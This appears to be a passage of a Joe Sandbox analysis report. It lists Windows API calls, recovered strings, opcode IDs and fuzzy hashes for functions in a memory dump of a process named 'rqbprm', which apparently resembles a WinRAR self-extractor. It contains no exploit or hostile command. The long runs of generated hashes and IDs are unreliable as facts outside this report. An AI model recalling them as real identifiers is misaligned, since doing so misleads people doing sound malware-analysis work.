                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7AC64E7F,00000001,00000000,00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FD99
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE14
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00C7FE1F
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE48
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE52
                                                                                              • GetLastError.KERNEL32(80070057,7AC64E7F,00000001,00000000,00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE57
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE6A
                                                                                              • GetLastError.KERNEL32(00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE80
                                                                                              • _com_issue_error.COMSUPP ref: 00C7FE93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 2d63020c5845c99259bfd0437e6f162e9a1998527b024e9cbc0e1e09be397e29
                                                                                              • Instruction ID: 6f90c4ae2d840a3827db173794edd4430d037e2d639988066874d97edbed1c05
                                                                                              • Opcode Fuzzy Hash: 2d63020c5845c99259bfd0437e6f162e9a1998527b024e9cbc0e1e09be397e29
                                                                                              • Instruction Fuzzy Hash: B941F971A00259EBDB10DF65CC89BAEBBE8EF44710F10823EF919E7251D7349A01D7A5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 654b66579cff2e8b75e08c9000bbbf3557d7a60d107849bb5cd7ec139ba01aee
                                                                                              • Instruction ID: 7c6d35f14cd51a9056aa0e5cc3d2e1e952e541ec67a081dab287688475f5e331
                                                                                              • Opcode Fuzzy Hash: 654b66579cff2e8b75e08c9000bbbf3557d7a60d107849bb5cd7ec139ba01aee
                                                                                              • Instruction Fuzzy Hash: CD715D71A00619EFDF24DFA5CC99AAFBBB9FF48710B140159E512E72A0CB30AE41CB51
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C69387
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00C693AA
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00C693C9
                                                                                                • Part of subcall function 00C6C29A: _wcslen.LIBCMT ref: 00C6C2A2
                                                                                                • Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1
                                                                                              • _swprintf.LIBCMT ref: 00C69465
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00C694D4
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00C69514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: f59c472d3c598f2581ad3dc5d183d4a38954f82d9e764ed202d0f39cbb19b716
                                                                                              • Instruction ID: b585ff06563527461d08e3b18eb4807eb4a539562b09bbeb5cea39297c97756f
                                                                                              • Opcode Fuzzy Hash: f59c472d3c598f2581ad3dc5d183d4a38954f82d9e764ed202d0f39cbb19b716
                                                                                              • Instruction Fuzzy Hash: 734179B1900258A6DF31EBA0CCD5EEE737CEF45740F0049A5B65AE3051DB388B89EB60
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00C7122E
                                                                                                • Part of subcall function 00C6B146: GetVersionExW.KERNEL32(?), ref: 00C6B16B
                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00C71251
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00C71263
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00C71274
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71284
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71294
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00C712CF
                                                                                              • __aullrem.LIBCMT ref: 00C71379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: d8a43c97e1b54c65a6237f0c5f706dc6b4a235507ecfca11dd2ccd8c6b256ef4
                                                                                              • Instruction ID: ae319a58b255c386bd7e62fbfdbe527be8329a5e471b89454cbadf2a021b0dec
                                                                                              • Opcode Fuzzy Hash: d8a43c97e1b54c65a6237f0c5f706dc6b4a235507ecfca11dd2ccd8c6b256ef4
                                                                                              • Instruction Fuzzy Hash: 1E41F8B1508345AFC710DF65C884A6FBBE9FF88314F04892EF99AC2210E738E659DB51
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C62536
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 3053425827-2277559157
                                                                                              • Opcode ID: ac995e3181204cfff87593924a07e1a5232fb3aea34bf8823e886502437d54c7
                                                                                              • Instruction ID: 59445f2d6535e773715642782e3d03de4f369321151bacd05fa2416a1d324e9f
                                                                                              • Opcode Fuzzy Hash: ac995e3181204cfff87593924a07e1a5232fb3aea34bf8823e886502437d54c7
                                                                                              • Instruction Fuzzy Hash: 52F144716087409BCB35EF2888D5BFE77996F94300F08456DFDDA9B283CB248A49C762
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: a83b0251bcbfef44ba64334634cfb8fad77867869c959a49d2324fe56fd0f40a
                                                                                              • Instruction ID: 6484aa97358f0687f93ac9833b4c431ed022fbf42cde590d40f609f75234f25f
                                                                                              • Opcode Fuzzy Hash: a83b0251bcbfef44ba64334634cfb8fad77867869c959a49d2324fe56fd0f40a
                                                                                              • Instruction Fuzzy Hash: 8C51F86674032395DB309A699822B7673E1DFB1750F68C42BFDD98B2C0FB758E818261
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00C8FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8F6CF
                                                                                              • __fassign.LIBCMT ref: 00C8F74A
                                                                                              • __fassign.LIBCMT ref: 00C8F765
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00C8F78B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00C8FE02,00000000,?,?,?,?,?,?,?,?,?,00C8FE02,00000000), ref: 00C8F7AA
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00C8FE02,00000000,?,?,?,?,?,?,?,?,?,00C8FE02,00000000), ref: 00C8F7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 974fef4378f0703edf5367fec33ef3c0c56a59c4c4dba958e67a44caab8d42e7
                                                                                              • Instruction ID: 36a820618bf014f832c8880150d2af72c3947845e5cccb9b3982b3e9a4fff3e7
                                                                                              • Opcode Fuzzy Hash: 974fef4378f0703edf5367fec33ef3c0c56a59c4c4dba958e67a44caab8d42e7
                                                                                              • Instruction Fuzzy Hash: 1651C4B19002499FDB10DFA8DC85BEEBBF4EF09314F14416EE551E7291D770AA42CBA4
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C82937
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00C8293F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C829C8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C829F3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C82A48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 0040500cfee964357df9d507bfd3c402dffb3395d8da644d3fc9705ea06c33a2
                                                                                              • Instruction ID: 256ca9c7291296c11d5c280c619319f4173dad98a6b439cacc891e0721742189
                                                                                              • Opcode Fuzzy Hash: 0040500cfee964357df9d507bfd3c402dffb3395d8da644d3fc9705ea06c33a2
                                                                                              • Instruction Fuzzy Hash: A341D634A00248AFCF14EF68C889A9E7BF5EF44328F148055E815AB392D731DA01DB95
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00C79EEE
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00C79F44
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00C79FDB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00C79FE3
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00C79FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: 9604fd14804ec1d30a307daeb1e75ce6b2e22812dbb58d59ebea35acce179e84
                                                                                              • Instruction ID: 72cf7e0166a662288159ab6c41e86a893e9e83a4325f2dba17676dd8d09e38a3
                                                                                              • Opcode Fuzzy Hash: 9604fd14804ec1d30a307daeb1e75ce6b2e22812dbb58d59ebea35acce179e84
                                                                                              • Instruction Fuzzy Hash: 4241C032104210AFCB21AFA5EC48F6F7BB8FF48701F04C559F84A9A056DB34DA05DB65
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: 86f74633cd1b889ca4a5ddf4b92b8519ac97ad06cf19192bb74ccfd3c8cc6921
                                                                                              • Instruction ID: fc7b1df64029b6e1c4e873a2bcf5f03cb9bb2d1dbc0a7100da775a2c209b03a1
                                                                                              • Opcode Fuzzy Hash: 86f74633cd1b889ca4a5ddf4b92b8519ac97ad06cf19192bb74ccfd3c8cc6921
                                                                                              • Instruction Fuzzy Hash: 13317D3264434566EA34BB549C42B7A73A4EB90734F50C42FF5AE47280FB70AF4193A9
                                                                                              APIs
                                                                                                • Part of subcall function 00C8C868: _free.LIBCMT ref: 00C8C891
                                                                                              • _free.LIBCMT ref: 00C8C8F2
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C8C8FD
                                                                                              • _free.LIBCMT ref: 00C8C908
                                                                                              • _free.LIBCMT ref: 00C8C95C
                                                                                              • _free.LIBCMT ref: 00C8C967
                                                                                              • _free.LIBCMT ref: 00C8C972
                                                                                              • _free.LIBCMT ref: 00C8C97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: f0865281a3ce939608f327af74acc888ce43089d2a180d13d09d2ddea587222b
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: 5D1166715C0705B6E520B771CC8BFCB7BADDF00B08F400C15B29D665D2EA75B909A764
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00C7E669,00C7E5CC,00C7E86D), ref: 00C7E605
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00C7E61B
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00C7E630
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: fbc131a46a76dcba55ad113be4768bbdb6759a2867a8c32722109f76c53713a5
                                                                                              • Instruction ID: c7943a20c59d88692b268cc5a06ffbd370debe0f59509035ed562c9d5a37292d
                                                                                              • Opcode Fuzzy Hash: fbc131a46a76dcba55ad113be4768bbdb6759a2867a8c32722109f76c53713a5
                                                                                              • Instruction Fuzzy Hash: E6F02B737906769F4F225F769C88B6E22C86B2E78131584F9FD1DD3101EB20CE609B90
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C714C2
                                                                                                • Part of subcall function 00C6B146: GetVersionExW.KERNEL32(?), ref: 00C6B16B
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C714E6
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C71500
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00C71513
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71523
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71533
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: 72ce9149a44293818caeb97dc57298e4738c552ad4040927dd7a7a88c94986a0
                                                                                              • Instruction ID: 3d7eeeba6e6e439fac26823834a9bdcaa98d6ccb672954a67b04da99ed9b2339
                                                                                              • Opcode Fuzzy Hash: 72ce9149a44293818caeb97dc57298e4738c552ad4040927dd7a7a88c94986a0
                                                                                              • Instruction Fuzzy Hash: 6B31EA75108345ABC704DFA8C88499FB7F8BF98714F04591EF999C3210E734D649CBA6
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00C82AF1,00C802FC,00C7FA34), ref: 00C82B08
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C82B16
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C82B2F
                                                                                              • SetLastError.KERNEL32(00000000,00C82AF1,00C802FC,00C7FA34), ref: 00C82B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: a519fb3e9a552535d89290ec636e41ff4342d539c2b1cd39a621b0195ce8b5d3
                                                                                              • Instruction ID: 2ab14cb6840da6562770abf0d0fd23ccd5131e545bbdce6904346db9c3cd66e7
                                                                                              • Opcode Fuzzy Hash: a519fb3e9a552535d89290ec636e41ff4342d539c2b1cd39a621b0195ce8b5d3
                                                                                              • Instruction Fuzzy Hash: 5B01753211A311AFE6143AB5AC4DB3A2BD5EB51B7C760273BF521551E0EF515D40A34C
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00CA1030,00C84674,00CA1030,?,?,00C83F73,00000050,?,00CA1030,00000200), ref: 00C897E9
                                                                                              • _free.LIBCMT ref: 00C8981C
                                                                                              • _free.LIBCMT ref: 00C89844
                                                                                              • SetLastError.KERNEL32(00000000,?,00CA1030,00000200), ref: 00C89851
                                                                                              • SetLastError.KERNEL32(00000000,?,00CA1030,00000200), ref: 00C8985D
                                                                                              • _abort.LIBCMT ref: 00C89863
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 686566b1920c47430728e4c4213914a62a886de37dcb6af1c368e4a721b4f3cf
                                                                                              • Instruction ID: f561d556ed26d985d8c61218623cd70690cc9274dcb9a05daa539ba9a09dd3ea
                                                                                              • Opcode Fuzzy Hash: 686566b1920c47430728e4c4213914a62a886de37dcb6af1c368e4a721b4f3cf
                                                                                              • Instruction Fuzzy Hash: 0FF0A436140603A6C6123364AC0EB3F1A65CFE277DF29012AF524A22D2EF348916A76D
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00C7DC47
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7DC61
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7DC72
